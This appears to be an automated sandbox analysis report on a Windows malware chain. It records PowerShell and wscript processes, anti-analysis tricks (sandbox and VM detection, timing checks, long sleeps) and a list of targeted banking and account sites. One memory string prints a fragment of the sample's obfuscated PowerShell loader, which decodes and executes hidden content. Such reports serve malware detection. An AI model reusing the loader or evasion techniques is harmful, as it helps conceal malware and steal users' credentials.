Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDFE20 rdtsc 10_2_1FDDFE20
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5773 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4049 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7995 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1795 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Program Files (x86)\Windows Mail\wab.exe API coverage: 0.4 %
Source: C:\Windows\SysWOW64\recover.exe API coverage: 3.2 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2120 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6260 Thread sleep count: 7995 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3420 Thread sleep count: 1795 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2644 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe TID: 4776 Thread sleep count: 57 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe TID: 4776 Thread sleep time: -114000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\recover.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\recover.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\recover.exe Code function: 13_2_02D0B6B0 FindFirstFileW,FindNextFileW,FindClose, 13_2_02D0B6B0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: 424iy8O9X8.13.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: 424iy8O9X8.13.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: 424iy8O9X8.13.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: 424iy8O9X8.13.dr Binary or memory string: discord.comVMware20,11696487552f
Source: 424iy8O9X8.13.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: wab.exe, 0000000A.00000002.2619504780.000000000431F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@@5
Source: 424iy8O9X8.13.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: wab.exe, 00000011.00000002.2856546297.00000000031E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wab.exe, 0000000A.00000003.2492749809.000000000434D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2619611582.000000000434D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2492965729.000000000434D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 424iy8O9X8.13.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: 424iy8O9X8.13.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: 424iy8O9X8.13.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 424iy8O9X8.13.dr Binary or memory string: global block list test formVMware20,11696487552
Source: 424iy8O9X8.13.dr Binary or memory string: tasks.office.comVMware20,11696487552o
Source: wscript.exe, 00000001.00000003.2093611979.000001B70E26D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+ +R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') ;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike 'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(D$DTTr aDnFs,p,a tVr oHn,iNz eSdB)O ');Hydrolyzable (unkaiserlike ' $sgSl o bHa lM: DHe,cKeUnUtSrSaEl iUsTeFdf U=. C[ SSydsAt.e mV.,T e x.tS. EDnAc o d i n g ]C:S: A.S CII.IB.mGPe tSS,t.r.i n g (S$MU,n lba.i d )S ');Hydrolyzable (unkaiserlike 'v$pg.lBo b,a l,:CM,u s e.u mAiBs,e,=S$,D e,cCe,n t r,aPlEi.sRe d ..s uTbBsTt rIi,nCgG( 3.0E7C5.8 3O, 2,5B2 1.6D) ');Hydrolyzable $Museumise;"Printer Extensions and NotificationsUser Profile ServiceWindows PushToInstall ServiceQuality Windows Audio Video ExperienceRemote Access Auto Connection ManagerRemote Access Connection ManagerRouting and Remote AccessRemote RegistryRetail Demo ServiceRadio Management ServiceRPC Endpoint MapperRemote Procedure Call (RPC) LocatorRemote Procedure Call (RPC)Security Accounts ManagerSmart CardSmart Card Device Enumeration ServiceTask SchedulerSmart Card Removal PolicyWindows BackupSecondary Log-onWindows Security ServicePayments and NFC/SE ManagerSystem Event Notification ServiceWindows Defender Advanced Threat Protection ServiceSensor Data ServiceSensor ServiceSensor Monitoring ServiceRemote Desktop ConfigurationSystem Guard Runtime Monitor BrokerInternet Connection Sharing (ICS)Spatial Data ServiceShell Hardware DetectionShared PC Account ManagerMicrosoft Storage Spaces SMPMicrosoft Windows SMS Router Service.SNMP TrapWindows Perception ServicePrint SpoolerSoftware ProtectionSSDP DiscoveryOpenSSH Authentication AgentSecure Socket Tunneling Protocol ServiceState Repository ServiceWindows Image Acquisition (WIA)Storage ServiceSpot VerifierMicrosoft Software Shadow Copy ProviderSysMainSystem Events BrokerTouch Keyboard and Handwriting Panel ServiceTelephonyRemote Desktop ServicesThemesStorage Tiers ManagementTime BrokerWeb Account ManagerDistributed Link Tracking ClientRecommended Troubleshooting ServiceWindows Modules InstallerAuto Time Zone UpdaterUser Experience Virtualization ServiceRemote Desktop Services UserMode Port RedirectorUPnP Device HostUser ManagerUpdate Orchestrator
Source: 424iy8O9X8.13.dr Binary or memory string: AMC password management pageVMware20,11696487552
Source: powershell.exe, 00000002.00000002.2652707419.00000243354FD000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000D.00000002.3357718213.0000000002DF5000.00000004.00000020.00020000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000E.00000002.3358949019.000000000123F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 424iy8O9X8.13.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: 424iy8O9X8.13.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 424iy8O9X8.13.dr Binary or memory string: dev.azure.comVMware20,11696487552j
Source: 424iy8O9X8.13.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: 424iy8O9X8.13.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: wab.exe, 0000000F.00000002.2771870139.00000000031B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 424iy8O9X8.13.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 424iy8O9X8.13.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: 424iy8O9X8.13.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: 424iy8O9X8.13.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: 424iy8O9X8.13.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: 424iy8O9X8.13.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: 424iy8O9X8.13.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: 424iy8O9X8.13.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 424iy8O9X8.13.dr Binary or memory string: outlook.office.comVMware20,11696487552s
Source: wscript.exe, 00000001.00000002.2094818305.000001B70E252000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tallerAuto Time Zone UpdaterUser Experience Virtualization ServiceRemote Desktop Services UserMode Port RedirectorUPnP Device HostUser ManagerUpdate Orchestrator ServiceVolumetric Audio Compositor ServiceCredential ManagerVirtual DiskHyper-V Guest Service InterfacevmicheartbeatHyper-V Data Exchange ServiceHyper-V Remote Desktop Virtualization ServicevmicshutdownHyper-V Time Synchronization ServiceHyper-V PowerShell Direct ServicevmicvssVolume Shadow CopyWindows TimeWalletServiceWarpJITSvcBlock Level Backup user ServiceWindows Biometric ServiceWindows Connection ManagerWindows Connect Now - Config RegistrarDiagnostic Service HostDiagnostic System HostMicrosoft Defender Antivirus Network Inspection ServiceWebClientWindows Event CollectorWindows Encryption Provider Host ServiceProblem Reports Control Panel SupportWindows Error Reporting ServiceWi-Fi Direct Services Connection Manager ServiceStill Image Acquisition EventsMicrosoft Defender Antivirus ServiceWinHTTP Web Proxy Auto-Discovery ServiceWindows Management InstrumentationWindows Remote Management (WS-Management)Windows Insider ServiceWLAN AutoConfigMicrosoft Account Sign-in AssistantLocal Profile Assistant ServiceWindows Management ServiceWMI Performance AdapterWindows Media Player Network 